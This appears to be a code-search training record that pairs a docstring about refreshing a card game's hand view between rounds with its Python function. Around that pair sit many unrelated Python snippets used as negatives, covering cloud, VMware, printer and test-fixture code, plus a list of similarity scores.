{})),\n 'connection_draining': parser.json_stringify(\n backend_service.get('connectionDraining', {})),\n 'enable_cdn': self._to_bool(\n backend_service.get('enableCDN')),\n 'health_checks': parser.json_stringify(\n backend_service.get('healthChecks', [])),\n 'iap': parser.json_stringify(\n backend_service.get('iap', {})),\n 'load_balancing_scheme': backend_service.get(\n 'loadBalancingScheme'),\n 'port': self._to_int(backend_service.get('port')),\n 'port_name': backend_service.get('portName'),\n 'protocol': backend_service.get('protocol'),\n 'region': backend_service.get('region'),\n 'session_affinity': backend_service.get(\n 'sessionAffinity'),\n 'timeout_sec': backend_service.get('timeoutSec'),\n 'raw_backend_service':\n parser.json_stringify(backend_service)}", "def vcac_getvm_detail_svrreq(self, srid):\n \n self.reqid=srid\n try:\n #Get the name of the vm and return JSON formatted response\n \n jfile=os.path.join(\"%s\", \"%s.json\") % (self.data['rundir'], self.reqid )\n print \"\\n\"\n print \"######## [Waiting for customization for SR: %s] ########\" % self.reqid\n print \"\\n\"\n time.sleep(300.0)\n vrapath=BASE_DIR + '/' + 'tools/vracc/bin/'\n cmd=\"cd %s && ./cloudclient.sh vra machines list --requestId %s --format \" \\\n \"JSON --export %s\" % ( vrapath, self.reqid, jfile )\n request = execute_action(cmd)\n except APIError, e:\n print \"Found error## vcac_getvm_detail_svrreq: %s\" % str(e)\n sys.exit(1)\n else:\n logging.debug(\"Verify return value after validation query: %s\" % (request))\n self.gtintval = self.gtintval + 300\n if os.path.exists(jfile) and os.stat(jfile).st_size > 0:\n logging.info(\"After provision data file: %s\" % (jfile))\n try:\n with open(jfile) as data_file:\n reqData = json.load(data_file)\n except APIError, e:\n print \"Loading Json found problem: %s\" % str(e)\n sys.exit(1)\n\n \n if 'name' in reqData[0] and 'status' in reqData[0]:\n logging.debug(\"Value ##### %s\" % reqData[0]['name'])\n for j in range(len(reqData[0]['networks'])):\n logging.info(\"Hostname %s configured \" \\\n \"with Ip address %s\" % \\\n ( reqData[0]['name'], reqData[0]['networks'][j]['address']))\n self.vmstat[self.reqid]['vmname']=reqData[0]['name']\n self.vmstat[self.reqid]['ipaddress']=reqData[0]['networks'][j]['address']\n self.vmstat[self.reqid]['vmid']=reqData[0]['catalogResource']['parentResourceRef']['id']\n print \"\\n\"\n print \"SR Reached IP: %s (HH:MM:SS)\" % \\\n str(datetime.timedelta(seconds=self.gtintval))\n break\n else:\n self.vmstat[self.reqid]['vmname'] = \"\"\n self.vmstat[self.reqid]['ipaddress'] = \"\"\n self.vmstat[self.reqid]['ipaddress'] = \"\"\n\n else:\n logging.warn(\"- vcac cloudclient json file missing \" \\\n \"or does not contains hostname or Ip \" \\\n \"details i.e empty\")\n self.vmstat[self.reqid]['vmname'] = \"\"\n self.vmstat[self.reqid]['ipaddress'] = \"\"\n self.vmstat[self.reqid]['ipaddress'] = \"\"\n #self.update_helpdesk(self.reqdata)\n \n \n logging.debug(\"Before return: %s\" % reqData )\n logging.debug(\"Real Value return: %s\" % self.vmstat )\n return self.vmstat", "def main():\n\n args = cli.get_args()\n\n audit = {}\n try:\n service_instance,content = connect_vc(args.host,args.user,args.password,args.port)\n\n if sys.stdout.isatty():\n print(\"vCenter: %s\" % args.host)\n \n content = service_instance.RetrieveContent()\n\n container = content.rootFolder # starting point to look into\n datacenters = get_datacenters(content)\n for dc in datacenters:\n datacenters[dc]['clusters'] = get_clusters(datacenters[dc]['dc'])\n\n datacenters[dc]['vms'] = get_vms(datacenters[dc]['dc'].vmFolder)\n \n get_nets(dc)\n get_dstores(dc)\n\n vmcount=0\n \n for dc in datacenters:\n for vm in sorted(datacenters[dc]['vms'],key=lambda s: s.lower()):\n vmcount+=1\n v = datacenters[dc]['vms'][vm]\n c = find_cluster(datacenters[dc]['clusters'],v.runtime.host.name)\n vort = \"Template\" if v.summary.config.template == True else \"VM\"\n audit[v.name]={}\n audit[v.name]['datacenter'] = dc\n audit[v.name]['cluster'] = c\n audit[v.name]['type'] = vort\n audit[v.name]['hostname'] = v.summary.guest.hostName\n audit[v.name]['guestid'] = v.config.guestId\n audit[v.name]['fullname'] = v.summary.config.guestFullName\n audit[v.name]['state'] = v.runtime.powerState\n audit[v.name]['ip'] = v.guest.ipAddress\n if sys.stdout.isatty():\n print(vmcount,\"Guests processed\",end='\\r')\n sys.stdout.flush()\n# print(\"%-15s:%-10s %-8s %-30s %-30s %s %s %s %s\" % (dc, c, vort,v.name,v.summary.guest.hostName, v.config.guestId, v.summary.config.guestFullName,v.guest.guestState,v.guest.ipAddress ))\n #print vort, v.name, v.summary.guest.hostName, v.guest.guestId, v.summary.config.guestFullName,v.guest.guestState,v.guest.ipAddress #,v.summary\n# print(\"\\ncount:\",vmcount)\n \n print(json.dumps(audit, indent=4, separators=(',', ': ')))\n \n except vmodl.MethodFault as error:\n print(\"Caught vmodl fault : \" + error.msg)\n return -1\n\n return 0", "def _prepare_get_request(self, key):\n\n return {\n 'TableName': self.table_name,\n 'Key': {\n self._key_field.name: {\n self._key_field.data_type: key\n }\n }\n }", "def pull_templates(self):\n try:\n backend_templates = self.client.list_all_templates()\n except VMwareError as e:\n raise VMwareBackendError(e)\n\n if is_basic_mode():\n # If basic mode is enabled, we should filter out templates which have more than 1 NIC\n backend_templates = [\n template\n for template in backend_templates\n if len(template['template']['nics']) == 1\n ]\n\n backend_templates_map = {\n item['library_item']['id']: item for item in backend_templates\n }\n\n frontend_templates_map = {\n p.backend_id: p\n for p in models.Template.objects.filter(settings=self.settings)\n }\n\n stale_ids = set(frontend_templates_map.keys()) - set(\n backend_templates_map.keys()\n )\n new_ids = set(backend_templates_map.keys()) - set(frontend_templates_map.keys())\n common_ids = set(backend_templates_map.keys()) & set(\n frontend_templates_map.keys()\n )\n\n for library_item_id in new_ids:\n template = self._backend_template_to_template(\n backend_templates_map[library_item_id]\n )\n template.save()\n\n for library_item_id in common_ids:\n backend_template = self._backend_template_to_template(\n backend_templates_map[library_item_id]\n )\n frontend_template = frontend_templates_map[library_item_id]\n fields = (\n 'cores',\n 'cores_per_socket',\n 'ram',\n 'disk',\n 'guest_os',\n 'modified',\n 'description',\n )\n update_pulled_fields(frontend_template, backend_template, fields)\n\n models.Template.objects.filter(\n settings=self.settings, backend_id__in=stale_ids\n ).delete()", "def create_data_model():\n data = {}\n # Locations in block units\n data['locations'] = [\n ] # yapf: disable\n data['num_vehicles'] = 1\n data['depot'] = 0\n return data", "def _build_base_structure(self):\n result = dict(self.contents)\n # clean out optional fields that were missing\n if not self.contents[DataParticleKey.PORT_TIMESTAMP]:\n del result[DataParticleKey.PORT_TIMESTAMP]\n if not self.contents[DataParticleKey.INTERNAL_TIMESTAMP]:\n del result[DataParticleKey.INTERNAL_TIMESTAMP]\n return result", "def _createDataFromProject(self):\n project_dict = self._project.asDict()\n data_blocks = {}\n headers_blocks = {}\n for experiment_id, experiment_dict in project_dict['experiments'].items():\n data = []\n headers = []\n for data_id, data_list in experiment_dict['calculated'].items():\n headers.append(data_id)\n data.append(data_list)\n headers_blocks[experiment_id] = headers\n data_transposed = [*zip(*data)]\n data_blocks[experiment_id] = data_transposed\n return headers_blocks, data_blocks", "def _fill_template(\n self,\n template: Dict[Text, Any],\n template_vars: Dict[Text, Any]\n ) -> Dict[Text, Any]:\n\n line_object_keys = [\"quickReply\", \"items\", \"action\", \"template\", \"actions\"]\n\n if type(template) == list:\n for item in template:\n self._fill_template(item, template_vars)\n else:\n self._fill_template_text(template, template_vars)\n for key in line_object_keys:\n if key in template:\n self._fill_template(template[key], template_vars)\n\n return template", "def build_structure(self):\n session = meta.Session()\n \n content = {}\n \n # TODO key metadata?\n if self.include_key_metadata:\n content['key_metadata'] = [kmd.to_dict(encode=False) for kmd in session.query(model.KeyMetadata).all()]\n \n content['resources'] = []\n \n rsrc_t = model.resources_table\n pass_t = model.passwords_table\n grp_t = model.groups_table\n \n q = session.query(model.Resource).order_by(rsrc_t.c.name)\n if self.resource_filters:\n q = q.join(model.GroupResource)\n q = q.filter(and_(*self.resource_filters))\n \n q = q.order_by(rsrc_t.c.name)\n for resource in q.all():\n rdict = resource.to_dict(decrypt=True)\n pw_q = resource.passwords\n if self.password_filters:\n pw_q = pw_q.filter(and_(*self.password_filters))\n pw_q = pw_q.order_by(pass_t.c.username)\n rdict['passwords'] = [pw.to_dict(decrypt=True) for pw in pw_q.all()]\n rdict['groups'] = [g.name for g in resource.groups.order_by(grp_t.c.name).all()]\n content['resources'].append(rdict)\n \n return content", "def extract_info(self, snyk_data, json_data):\n for eco in SUPPORTED_ECOSYSTEMS:\n if eco in snyk_data:\n logger.info(\"Adding data for {} from the parsed snyk feed.\".format(eco))\n eco_data = snyk_data[eco]\n for pkg in eco_data:\n if pkg not in json_data[eco]:\n json_data[eco][pkg] = {}\n for vuln in eco_data[pkg]['vulnerabilities']:\n id = vuln['id']\n logger.info(\"Adding {}.\".format(id))\n json_data[eco][pkg][id] = self.generate_vuln_json(vuln, pkg)\n else:\n logger.info(\"No data for {} present in the parsed snyk feed.\".format(eco))\n return json_data", "def _process_dict(data):\n new_dict = {}\n for key in data.keys():\n\tnew_dict['name'] = data['printerName']\n #new_dict[key] = data[key]\n\n #FIGURE OUT AND UPDATE PRINTER STATUS\n status = BUSY_STATUS\n error_msg = \"\"\n if \"FrontPanelMessage\" in data:\n if data[\"FrontPanelMessage\"].lower() in READY_MESSAGES:\n status = READY_STATUS\n elif \"error\" in data[\"FrontPanelMessage\"].lower():\n status = ERROR_STATUS\n error_msg = \"general error\"\n \n if \"TonerStatus\" in data:\n if data[\"TonerStatus\"].find(\"2\") != -1:\n status = ERROR_STATUS\n error_msg = \"Toner Error\"\n #if len(new_dict[\"TonerStatus\"]) > 4:\n #new_dict[\"TonerStatus\"] = new_dict[\"TonerStatus\"][4:]\n\n if \"PaperStatus\" in data:\n if data[\"PaperStatus\"].find(\"2\") != -1:\n status = ERROR_STATUS\n error_msg = \"Paper Status Error\"\n elif data[\"PaperStatus\"].find(\"1\") != -1:\n status = ERROR_STATUS\n error_msg = \"Out of Paper\"\n #if len(new_dict[\"PaperStatus\"]) > 4:\n #new_dict[\"PaperStatus\"] = new_dict[\"PaperStatus\"][4:]\n\n if \"PaperJamStatus\" in data:\n if data[\"PaperJamStatus\"].find(\"1\") != -1:\n status = ERROR_STATUS\n error_msg = \"Paper Jam\"\n #if len(new_dict[\"PaperJamStatus\"]) > 4:\n #new_dict[\"PaperJamStatus\"] = new_dict[\"PaperJamStatus\"][4:]\n\n new_dict[\"status\"] = status\n new_dict[\"error_msg\"] = error_msg\n new_dict[\"location\"] = PRINTERS[new_dict[\"name\"]][0]\n new_dict[\"building_name\"] = PRINTERS[new_dict[\"name\"]][1]\n new_dict[\"latitude\"] = PRINTERS[new_dict[\"name\"]][2]\n new_dict[\"longitude\"] = PRINTERS[new_dict[\"name\"]][3]\n new_dict[\"atResidence\"] = PRINTERS[new_dict[\"name\"]][4]\n return new_dict", "def _get_user_data(self):\n return {\"key\": self._key}", "def _create_instance_dict(**kwargs):\n inst = {}\n # NOTE(jk0): If an integer is passed as the image_ref, the image\n # service will use the default image service (in this case, the fake).\n inst['image_ref'] = '1'\n inst['reservation_id'] = 'r-fakeres'\n inst['user_id'] = kwargs.get('user_id', 'admin')\n inst['project_id'] = kwargs.get('project_id', 'fake')\n inst['instance_type_id'] = '1'\n inst['host'] = kwargs.get('host', 'dummy')\n inst['vcpus'] = kwargs.get('vcpus', 1)\n inst['memory_mb'] = kwargs.get('memory_mb', 20)\n inst['local_gb'] = kwargs.get('local_gb', 30)\n inst['vm_state'] = kwargs.get('vm_state', vm_states.ACTIVE)\n inst['power_state'] = kwargs.get('power_state', power_state.RUNNING)\n inst['task_state'] = kwargs.get('task_state', None)\n inst['availability_zone'] = kwargs.get('availability_zone', None)\n inst['ami_launch_index'] = 0\n inst['launched_on'] = kwargs.get('launched_on', 'dummy')\n return inst", "def __init__(self):\n self.id = None\n self.typeInfo['id'] = 'string'\n \"\"\"the account associated with the disk volume\"\"\"\n self.account = None\n self.typeInfo['account'] = 'string'\n \"\"\"the create date of the vm snapshot\"\"\"\n self.created = None\n self.typeInfo['created'] = 'date'\n \"\"\"indiates if this is current snapshot\"\"\"\n self.current = None\n self.typeInfo['current'] = 'boolean'\n \"\"\"the description of the vm snapshot\"\"\"\n self.description = None\n self.typeInfo['description'] = 'string'\n \"\"\"the display name of the vm snapshot\"\"\"\n self.displayname = None\n self.typeInfo['displayname'] = 'string'\n \"\"\"the domain associated with the disk volume\"\"\"\n self.domain = None\n self.typeInfo['domain'] = 'string'\n \"\"\"the ID of the domain associated with the disk volume\"\"\"\n self.domainid = None\n self.typeInfo['domainid'] = 'string'\n \"\"\"the name of the vm snapshot\"\"\"\n self.name = None\n self.typeInfo['name'] = 'string'\n \"\"\"the parent ID of the vm snapshot\"\"\"\n self.parent = None\n self.typeInfo['parent'] = 'string'\n \"\"\"the parent displayName of the vm snapshot\"\"\"\n self.parentName = None\n self.typeInfo['parentName'] = 'string'\n \"\"\"the project name of the vpn\"\"\"\n self.project = None\n self.typeInfo['project'] = 'string'\n \"\"\"the project id of the vpn\"\"\"\n self.projectid = None\n self.typeInfo['projectid'] = 'string'\n \"\"\"the state of the vm snapshot\"\"\"\n self.state = None\n self.typeInfo['state'] = 'state'\n \"\"\"VM Snapshot type\"\"\"\n self.type = None\n self.typeInfo['type'] = 'string'\n \"\"\"the vm ID of the vm snapshot\"\"\"\n self.virtualmachineid = None\n self.typeInfo['virtualmachineid'] = 'string'\n \"\"\"the Zone ID of the vm snapshot\"\"\"\n self.zoneid = None\n self.typeInfo['zoneid'] = 'string'", "def get_data_for_task_manager(data: dict) -> dict:\n if check_host(data['hostIp']):\n command = f\"ssh user@{data['hostIp']} -i ../id_rsa 'C:\\Setup\\{data['scriptName']}'\"\n dict_from_device = check_response_from_device(start_process_on_device(command))\n if dict_from_device[\"stringFromDevice\"] == \"correct\": \n dict_from_device[\"resultRequest\"] = True\n return dict_from_device\n return dict(resultRequest=False)", "def get_context_data(self):\n try:\n app_data = self._get_app_data()\n except (LTIException, PortabilityError) as error:\n logger.warning(str(error))\n app_data = {\n \"state\": \"error\",\n \"modelName\": self.model.RESOURCE_NAME,\n \"resource\": None,\n }\n\n return {\n \"app_data\": json.dumps(app_data),\n \"static_base_url\": f\"{settings.ABSOLUTE_STATIC_URL}js/\",\n \"external_javascript_scripts\": settings.EXTERNAL_JAVASCRIPT_SCRIPTS,\n }", "def _dump_template(self, utils_image) -> Dict[str, str]:\n cmd = f\"docker run -i --rm --entrypoint python {utils_image}\"\n p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT)\n out, _ = p.communicate(input=SCRIPT.encode())\n output = out.decode()\n if p.returncode != 0:\n self._logger.error(\"Failed to dump %s template.py\\n%s\", utils_image, output)\n raise RuntimeError(\"Failed to dump %s template.py\" % utils_image)\n lines = output.splitlines()\n result = {}\n for line in lines:\n key, value = line.split()\n result[key] = value\n return result", "def template_data(self) -> pulumi.Output[Any]:\n return pulumi.get(self, \"template_data\")", "def prepare_product_update_data(self, template, update_image, update_basic_detail, data):\n instance = template.woo_instance_id\n flag = False\n tmpl_images = []\n if update_image:\n tmpl_images += self.get_gallery_images(instance, template, template.product_tmpl_id)\n data.update({\"images\":tmpl_images})\n flag = True\n\n if update_basic_detail:\n\n weight = self.convert_weight_by_uom(template.product_tmpl_id.weight, instance)\n\n description = ''\n short_description = ''\n if template.woo_description:\n woo_template_id = template.with_context(lang=instance.woo_lang_id.code)\n description = woo_template_id.woo_description\n\n if template.woo_short_description:\n woo_template_id = template.with_context(lang=instance.woo_lang_id.code)\n short_description = woo_template_id.woo_short_description\n data.update({\n 'name':template.name,\n 'enable_html_description':True,\n 'enable_html_short_description':True, 'description':description,\n 'short_description':short_description,\n 'weight':str(weight),\n 'taxable':template.taxable and 'true' or 'false'\n })\n woo_categ_ids = list(map(int,template.woo_categ_ids.mapped(\"woo_categ_id\")))\n if all(woo_categ_ids):\n categ_ids = [{'id': cat_id} for cat_id in woo_categ_ids]\n data.update({'categories':categ_ids})\n\n woo_tag_ids = list(map(int,template.woo_tag_ids.mapped(\"woo_tag_id\")))\n if all(woo_tag_ids):\n tag_ids = [{'id': tag_id} for tag_id in woo_tag_ids]\n data.update({'tags':tag_ids})\n\n return flag, data", "def create_current_host_dict_playbook(self):\n\n host_dict = {\n 'no_access_hosts': self.module.params['no_access_hosts'],\n 'read_only_hosts': self.module.params['read_only_hosts'],\n 'read_only_root_hosts': self.module.params[\n 'read_only_root_hosts'],\n 'read_write_hosts': self.module.params['read_write_hosts'],\n 'read_write_root_hosts': self.module.params[\n 'read_write_root_hosts']\n }\n return host_dict", "def gen_vault_response_kv2(gen_processed_config):\n\n def _gen_vault_repsonse(processed_config=gen_processed_config(), user_key=\"user\", pwd_key=\"pwd\"):\n vault_response = {\n \"data\": {\n \"data\": {user_key: processed_config[\"acme\"][\"user\"], pwd_key: processed_config[\"acme\"][\"pwd\"]},\n \"metadata\": {},\n }\n }\n return vault_response\n\n return _gen_vault_repsonse", "def test_ws_getItemInfosWithReusedPODTemplates(self):\n # in the PM test profile, some templates are only defined for the plonemeeting-assembly\n self.usedMeetingConfigId = \"plonegov-assembly\"\n self.changeUser('pmCreator1')\n item = self.create('MeetingItem')\n # first check that the only returned template is a template rusing another\n viewlet = self._get_viewlet(\n context=item,\n manager_name='plone.belowcontenttitle',\n viewlet_name='document-generation-link')\n templates = viewlet.get_generable_templates()\n self.assertEqual(len(templates), 1)\n self.assertTrue(templates[0].pod_template_to_use)\n self.assertIsNone(templates[0].odt_file)\n # get the reponse\n resp = self._getItemInfos(item.UID(), showTemplates=True, toBeDeserialized=False)\n # we have 1 template\n self.assertEqual(len(resp._itemInfo[0]._templates), 1)\n # templateFilename was taken from template to use\n self.assertEqual(resp._itemInfo[0]._templates[0]._templateFilename, u'Item.odt')\n self.assertEqual(resp._itemInfo[0]._templates[0]._templateFormat, 'odt')", "def gen_vault_response_kv1(gen_processed_config):\n\n def _gen_vault_repsonse(processed_config=gen_processed_config(), user_key=\"user\", pwd_key=\"pwd\"):\n vault_response = {\n \"data\": {user_key: processed_config[\"acme\"][\"user\"], pwd_key: processed_config[\"acme\"][\"pwd\"]}\n }\n return vault_response\n\n return _gen_vault_repsonse", "def fixture_tile_details():\n return {\n \"version\": 1,\n \"revision\": 1,\n \"timestamp\": \"2018-06-19T23:04:39.097Z\",\n \"timestamp_ms\": 1529449479097,\n \"result_code\": 0,\n \"result\": {\n TILE_TILE_UUID: {\n \"thumbnailImage\": \"https://local-tile-pub.s3.amazonaws.com/..\",\n \"tileState\": {\n \"ringStateCode\": 0,\n \"connectionStateCode\": 0,\n \"uuid\": TILE_TILE_UUID,\n \"tile_uuid\": TILE_TILE_UUID,\n \"client_uuid\": TILE_CLIENT_UUID,\n \"timestamp\": 1512615215149,\n \"advertised_rssi\": 1.4e-45,\n \"client_rssi\": 1.4e-45,\n \"battery_level\": 1.4e-45,\n \"latitude\": 21.9083423,\n \"longitude\": -72.4982138,\n \"altitude\": 1821.129812,\n \"h_accuracy\": 5.0,\n \"v_accuracy\": 3.0,\n \"speed\": 1.4e-45,\n \"course\": 1.4e-45,\n \"authentication\": None,\n \"owned\": True,\n \"has_authentication\": None,\n \"lost_timestamp\": -1,\n \"connection_client_uuid\": TILE_CLIENT_UUID,\n \"connection_event_timestamp\": 1512615234268,\n \"last_owner_update\": 1512615215149,\n \"connection_state\": \"READY\",\n \"ring_state\": \"STOPPED\",\n \"is_lost\": False,\n \"voip_state\": \"OFFLINE\",\n },\n \"entityName\": \"TILE\",\n \"tile_uuid\": \"19264d2dffdbca32\",\n \"firmware_version\": \"01.12.14.0\",\n \"owner_user_uuid\": \"2ea56f4d-6576-4b4e-af11-3410cc65e373\",\n \"name\": TILE_TILE_NAME,\n \"category\": None,\n \"image_url\": \"https://local-tile-pub.s3.amazonaws.com/...\",\n \"visible\": True,\n \"is_dead\": False,\n \"hw_version\": \"02.09\",\n \"product\": \"DUTCH1\",\n \"archetype\": \"WALLET\",\n \"configuration\": {\"fw10_advertising_interval\": None},\n \"last_tile_state\": {\n \"ringStateCode\": 0,\n \"connectionStateCode\": 0,\n \"uuid\": \"19264d2dffdbca32\",\n \"tile_uuid\": \"19264d2dffdbca32\",\n \"client_uuid\": \"a01bf97a-c89a-40e2-9534-29976010fb03\",\n \"timestamp\": 1512615215149,\n \"advertised_rssi\": 1.4e-45,\n \"client_rssi\": 1.4e-45,\n \"battery_level\": 1.4e-45,\n \"latitude\": 39.797571,\n \"longitude\": -104.887826,\n \"altitude\": 1588.002773,\n \"h_accuracy\": 5.0,\n \"v_accuracy\": 3.0,\n \"speed\": 1.4e-45,\n \"course\": 1.4e-45,\n \"authentication\": None,\n \"owned\": True,\n \"has_authentication\": None,\n \"lost_timestamp\": -1,\n \"connection_client_uuid\": TILE_CLIENT_UUID,\n \"connection_event_timestamp\": 1512615234268,\n \"last_owner_update\": 1512615215149,\n \"connection_state\": \"DISCONNECTED\",\n \"ring_state\": \"STOPPED\",\n \"is_lost\": False,\n \"voip_state\": \"OFFLINE\",\n },\n \"firmware\": {\n \"expected_firmware_version\": \"\",\n \"expected_firmware_imagename\": \"\",\n \"expected_firmware_urlprefix\": \"\",\n \"expected_firmware_publish_date\": 0,\n \"expected_ppm\": None,\n \"expected_advertising_interval\": None,\n \"security_level\": 1,\n \"expiry_timestamp\": 1529471079097,\n \"expected_tdt_cmd_config\": None,\n },\n \"auth_key\": \"aliuUAS7da980asdHJASDQ==\",\n \"renewal_status\": \"LEVEL1\",\n \"metadata\": {},\n \"auto_retile\": False,\n \"status\": \"ACTIVATED\",\n \"tile_type\": \"TILE\",\n \"registration_timestamp\": 1482711833983,\n \"is_lost\": False,\n \"auth_timestamp\": 1512287015405,\n \"activation_timestamp\": 1482711835011,\n \"last_modified_timestamp\": 1514353410254,\n }\n },\n }", "def create_dicts():\n load_data_for_dict('data/atis/train/seq.in', 'data/atis/voc/vocabulary.json')\n load_data_for_dict('data/atis/valid/seq.in', 'data/atis/voc/vocabulary.json')\n load_data_for_dict('data/atis/test/seq.in', 'data/atis/voc/vocabulary.json') \n load_data_for_dict('data/atis/train/seq.out', 'data/atis/voc/slot_vocabulary.json')" ]
[ "0.69213694", "0.6188512", "0.6179154", "0.6003007", "0.5900166", "0.58198947", "0.58040434", "0.5778774", "0.5772093", "0.5710987", "0.5700737", "0.56920326", "0.56712186", "0.566643", "0.564755", "0.56175077", "0.56043386", "0.5603194", "0.55743086", "0.5572557", "0.5553227", "0.55519825", "0.5510064", "0.5504329", "0.54972905", "0.5483972", "0.5468972", "0.54597336", "0.5429259", "0.5423212", "0.5398495", "0.53936344", "0.53705597", "0.5367941", "0.5359332", "0.5349633", "0.5348408", "0.5348325", "0.53444314", "0.5343028", "0.53360045", "0.53355515", "0.5332975", "0.529744", "0.5289834", "0.5281824", "0.5277394", "0.52753925", "0.5268477", "0.5265853", "0.52465034", "0.5242711", "0.5242412", "0.5228587", "0.51865286", "0.51854354", "0.51765853", "0.5174298", "0.5174165", "0.5174165", "0.51474994", "0.51379406", "0.5134101", "0.51313204", "0.51100296", "0.509941", "0.50761706", "0.5074135", "0.5072227", "0.507167", "0.50686496", "0.506859", "0.50656277", "0.5058943", "0.505637", "0.5053177", "0.5051827", "0.50502735", "0.503945", "0.50368994", "0.503652", "0.50354654", "0.5035388", "0.5030823", "0.50291556", "0.50228494", "0.50181854", "0.5012036", "0.5009403", "0.50090253", "0.50074196", "0.50046897", "0.49963942", "0.49931148", "0.4990816", "0.49852648", "0.49836087", "0.4981416", "0.4979277", "0.49768433" ]
0.7405127
0
This updates the view of the hand, between rounds it displays a message.
def update(self, player_index=0, num_players=1, visible_scards = []): self.visible_scards = visible_scards self.controller._state.player_index = player_index if self.num_players > num_players and self.controller._state.rules.Shared_Board \ and not self.need_updated_buttons: # A player has left the game after the round has begun -- make adjustments so game can continue. self.playerLeftGame(num_players) self.num_players = num_players if self.controller._state.round == -1: self.mesgBetweenRounds(self.help_text) if self.round_advance: self.round_index = self.round_index + 1 if self.round_index < len(self.Meld_Threshold): self.help_text[0] = 'This is the round of ' + str(self.Meld_Threshold[self.round_index]) + ' ! ' self.need_updated_buttons = True # used for Liverpool. else: self.help_text = ['Game has concluded. Scores for each round can be found in command window.'] self.round_advance = False else: if not self.round_index == self.controller._state.round: # Need this to true up round_index if a player joins mid-game. skipped_rounds = self.controller._state.round - self.round_index for idx in range(skipped_rounds): #todo: How to score latecomers should be moved to ruleset. score = 0 self.controller.lateJoinScores(score) self.round_index = self.controller._state.round self.round_advance = True # reset outline colors on ready buttons to what they need to be at the start of the "between rounds" state. self.ready_color_idx = 2 self.not_ready_color_idx = 6 self.last_hand = self.current_hand self.current_hand = self.controller.getHand() if len(self.current_hand) == 0: self.hand_info = [] elif not self.last_hand == self.current_hand: self.hand_info = HandManagement.WrapHand(self, self.current_hand, self.hand_info) HandManagement.ShowHolding(self, self.hand_info) # displays hand self.RuleSetsButtons.ButtonDisplay(self)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_display(self):\n self._clear_screen()\n print('Your score is {}'.format(self._roboc.score))\n print(self._roboc.currentmaze)\n print(\"Your viewpoint:\")\n print(self._roboc.get_hidden_game(4))", "def updateChat(self, ):\n self.__redrawChat()", "def viewUpdate(self):\n # Update Capture\n imgtk = self.model.capture\n self.updateImage(self.view.lmain, imgtk)\n # Update Stitch \n imgtk = self.model.stitch\n self.updateImage(self.view.rmain, imgtk)\n self.view.dist.set(self.model.dist)", "def updateDisplay(self, msg):\n t = msg.data\n self.displayLbl.SetLabel(\"%s\" % t)\n self.SetTitle(\"%s\" % t)", "def update_scoreboard(self):\n self.clear()\n self.goto(-(WIDTH//6), (HEIGHT//2-30))\n self.write(self.l_score, align = 'center', font = ('Courier', 20, 'normal'))\n self.goto((WIDTH//6), (HEIGHT//2-30))\n self.write(self.r_score, align = 'center', font = ('Courier', 20, 'normal'))", "def _refresh(self):\n self._need_display_update = True\n self._update()", "def refresh_screen(self):", "def update_board(self, player_answer, chaser_answer, answer):\n if player_answer == answer:\n self.b.player_step()\n line = 'You are RIGHT!'\n else:\n line = 'You are WRONG!'\n self.client.send((NO_RESPONSE + line).encode())\n if chaser_answer == answer:\n self.b.chaser_step()\n line = 'The Chaser is RIGHT!\\n'\n else:\n line = 'The Chaser is WRONG!\\n'\n self.client.send((NO_RESPONSE + line).encode())", "def update(self):\n self.board.update()", "def update_display(self):\r\n\r\n # The display.update() Updates the screen, making the new frame replace the old one. \r\n pg.display.update()\r\n \r\n # clock.tick sets a framerate for the game.\r\n # This is to make the game run at a stable fps \r\n self.clock.tick(cng.FRAMERATE)", "def _update_display(self, game, action):\n self._update_label(action.outer_pos, action.inner_pos, action.move)", "def redraw(self):\n self._view.delete(tk.ALL)\n self._view.draw_entities(self._world.get_all_things())\n # calculate the health and score in every step\n max_hp = self._player.get_max_health()\n current_hp = self._player.get_health()\n # if player is invincible, don't change health\n self._statue.set_health(current_hp / max_hp, self._player.get_invincible())\n self._statue.set_score(self._player.get_score())", "def updateComplete(self):\n self.livesScreen()\n if self.getWave().getLives() == 0:\n self.deathScreen()\n else:\n self.winScreen()", "def showdown(self):\r\n\r\n poker_hands = []\r\n message = \"\"\r\n for player in self.players:\r\n poker_hands.append(player.hand.best_poker_hand(self.community_cards.cards))\r\n\r\n # Reveal all cards when the round is over\r\n player.reveal_cards()\r\n\r\n if poker_hands[0].type > poker_hands[1].type:\r\n message = \"Player {} won! \\nPoker hand >{}< won against >{}<\".format(\r\n self.players[0].name, str(poker_hands[0].type), str(poker_hands[1].type))\r\n self.players[0].credits += self.pot\r\n\r\n if poker_hands[0].type < poker_hands[1].type:\r\n message = \"Player {} won! \\nPoker hand >{}< won against >{}<\".format(\r\n self.players[1].name, str(poker_hands[1].type), str(poker_hands[0].type))\r\n self.players[1].credits += self.pot\r\n\r\n if poker_hands[0].type == poker_hands[1].type:\r\n if poker_hands[0].highest_values > poker_hands[1].highest_values:\r\n message = \"Player {} won! \\nHighest value >{}< won against >{}<\".format(\r\n self.players[0].name, str(poker_hands[0].highest_values), str(poker_hands[1].highest_values))\r\n self.players[0].credits += self.pot\r\n\r\n elif poker_hands[0].highest_values < poker_hands[1].highest_values:\r\n message = \"Player {} won! \\nHighest value >{}< won against >{}<\".format(\r\n self.players[1].name, str(poker_hands[1].highest_values), str(poker_hands[0].highest_values))\r\n self.players[1].credits += self.pot\r\n\r\n elif poker_hands[0].highest_values == poker_hands[1].highest_values:\r\n message = \"It is a draw! Both players had >{}< and highest value >{}<\".format(\r\n poker_hands[0].type.name, str(poker_hands[0].highest_values))\r\n\r\n for player in self.players:\r\n player.credits += (self.pot // len(self.players))\r\n else:\r\n self.game_message_warning.emit(\"Incorrect comparison of poker hands\")\r\n\r\n self.new_output.emit(message)\r\n self.game_message.emit(message)\r\n self.new_credits.emit()\r\n self.new_pot.emit()", "def you_won(self):\n self.end_of_level()\n self.message_holder.add_widget(self.you_win_label)\n Clock.schedule_once(self.goto_next_level, 5)", "def update_H(self):", "def update(self, is_my_turn, clue_word, clue_num_guesses, guesses):\r\n pass", "def update(self):\n\n # Update guess tracker\n for i in range(atoms):\n\n ident = 'tracker' + str(i + 1)\n\n if i < len(game.guesslist):\n color = scheme.red\n else:\n color = scheme.white\n\n self.ids[ident].color = color\n\n # Update score\n self.ids.score.text = str(game.score)\n\n # Check for end game conditions! Make button (in)visible.\n if len(game.guesslist) == atoms:\n self.ids.end_button.disabled = False\n self.ids.end_button.opacity = 1\n else:\n self.ids.end_button.disabled = True\n self.ids.end_button.opacity = 0", "def update_figure(self):\n\n self.draw()", "def update(self):\n 